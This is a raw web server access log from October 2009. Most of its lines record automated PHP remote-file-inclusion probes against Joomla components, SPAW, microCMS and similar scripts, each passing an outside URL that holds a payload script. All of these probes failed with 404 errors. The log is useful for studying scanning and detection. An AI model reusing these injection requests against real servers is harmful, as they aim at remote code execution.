61.199.232.195 - - [13/Oct/2009:04:07:36 -0400] "GET /index.php?redir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
174.143.3.188 - - [13/Oct/2009:04:07:57 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
174.143.3.188 - - [13/Oct/2009:04:07:57 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
174.143.3.188 - - [13/Oct/2009:04:07:57 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
174.143.3.188 - - [13/Oct/2009:04:07:57 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
72.32.125.147 - - [13/Oct/2009:04:08:12 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:08:12 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:08:12 -0400] "GET /logs/access_log.Q109071300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:04:08:22 -0400] "GET /index.php?redir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
72.32.125.147 - - [13/Oct/2009:04:08:24 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:08:33 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:08:33 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:08:33 -0400] "GET /logs/access_log.Q109062800%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:08:40 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:08:40 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:08:40 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:09:06 -0400] "GET /logs/access_log.Q109072000%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:09:10 -0400] "GET /logs/access_log.Q109072000/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:04:09:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.32.125.147 - - [13/Oct/2009:04:09:40 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:09:40 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:09:42 -0400] "GET /logs/access_log.Q109071300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:09:44 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:09:44 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:09:44 -0400] "GET /logs/access_log.Q109071300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:09:50 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:09:51 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:10:04 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:10:08 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:10:08 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:10:15 -0400] "GET /logs/access_log.Q109072000/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:11:11 -0400] "GET //admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:11:11 -0400] "GET /logs//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:11:11 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:11:11 -0400] "GET /logs/access_log.Q109081300//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:11:19 -0400] "GET //admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:11:19 -0400] "GET /logs//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:11:19 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:11:19 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
119.63.199.23 - - [13/Oct/2009:04:11:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
218.219.198.195 - - [13/Oct/2009:04:12:09 -0400] "GET /logs/access_log.Q109061100//admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.219.198.195 - - [13/Oct/2009:04:12:10 -0400] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.219.198.195 - - [13/Oct/2009:04:12:25 -0400] "GET /logs/access_log.Q109061100//admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.219.198.195 - - [13/Oct/2009:04:12:25 -0400] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.234.36 - - [13/Oct/2009:04:12:29 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:12:29 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:12:29 -0400] "GET /logs/access_log.Q109062800%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:13:05 -0400] "GET //admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:13:05 -0400] "GET /logs//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:13:05 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:13:09 -0400] "GET /logs/access_log.Q109081300//admin/classes/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:13:18 -0400] "GET /logs/access_log.Q109071300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:13:20 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:13:58 -0400] "GET /logs/access_log.Q109072000%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
220.181.7.62 - - [13/Oct/2009:04:14:14 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [13/Oct/2009:04:14:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.219.198.195 - - [13/Oct/2009:04:15:28 -0400] "GET /logs/access_log.Q109061100//admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
218.219.198.195 - - [13/Oct/2009:04:15:28 -0400] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
218.219.198.195 - - [13/Oct/2009:04:15:29 -0400] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
174.143.3.188 - - [13/Oct/2009:04:15:53 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
174.143.3.188 - - [13/Oct/2009:04:15:53 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [13/Oct/2009:04:15:53 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
174.143.3.188 - - [13/Oct/2009:04:15:53 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
218.219.198.195 - - [13/Oct/2009:04:16:11 -0400] "GET /logs/access_log.Q109061100//admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
218.219.198.195 - - [13/Oct/2009:04:16:11 -0400] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
218.219.198.195 - - [13/Oct/2009:04:16:12 -0400] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
200.35.150.139 - - [13/Oct/2009:04:16:38 -0400] "GET //security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:16:38 -0400] "GET /logs//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:16:39 -0400] "GET /logs/access_log.Q109091300%20%20//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:16:40 -0400] "GET /logs/error_log.Q109091300%20%20//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:16:59 -0400] "GET //security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:16:59 -0400] "GET /logs//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:16:59 -0400] "GET /logs/access_log.Q109091300//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:17:01 -0400] "GET /logs/error_log.Q109091300//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.125.68.92 - - [13/Oct/2009:04:17:37 -0400] "GET /logs/access_log.Q109091700/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
121.125.68.92 - - [13/Oct/2009:04:17:37 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.63"
121.125.68.92 - - [13/Oct/2009:04:17:37 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.63"
200.35.150.139 - - [13/Oct/2009:04:18:00 -0400] "GET /logs/error_log.Q109091300%20%20//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:18:01 -0400] "GET /logs/access_log.Q109091300%20%20//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:18:29 -0400] "GET /logs/access_log.Q109091300//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:04:18:30 -0400] "GET /logs/error_log.Q109091300//security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:18:52 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:18:52 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:19:20 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:19:33 -0400] "GET /logs/access_log.Q109072000/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:04:19:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.78 - - [13/Oct/2009:04:20:19 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.219.198.195 - - [13/Oct/2009:04:20:51 -0400] "GET /logs/error_log.Q109061100//admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
218.219.198.195 - - [13/Oct/2009:04:21:14 -0400] "GET /logs/error_log.Q109061100//admin/includes/spaw/spaw_control.class.php?spaw_root=http://maxhost.org/scripts/v7id.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
121.125.68.92 - - [13/Oct/2009:04:22:07 -0400] "GET /logs/access_log.Q109070400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
193.200.255.18 - - [13/Oct/2009:04:22:54 -0400] "GET //micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:03 -0400] "GET /logs/error_log.Q109082100%20%20//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:04 -0400] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:05 -0400] "GET //micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:15 -0400] "GET /logs/error_log.Q109082100%20%20//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:15 -0400] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:40 -0400] "GET /logs/access_log.Q109080200%20%20//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:48 -0400] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:49 -0400] "GET //micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:50 -0400] "GET /logs/error_log.Q109082100//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:23:56 -0400] "GET /logs/access_log.Q109080200%20%20//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:24:19 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:24:21 -0400] "GET /logs/access_log.Q109080200//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:24:33 -0400] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:24:33 -0400] "GET //micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:24:33 -0400] "GET /logs/error_log.Q109082100%20%20//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
79.118.8.82 - - [13/Oct/2009:04:24:36 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:38 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:38 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:38 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:38 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:39 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:39 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:39 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
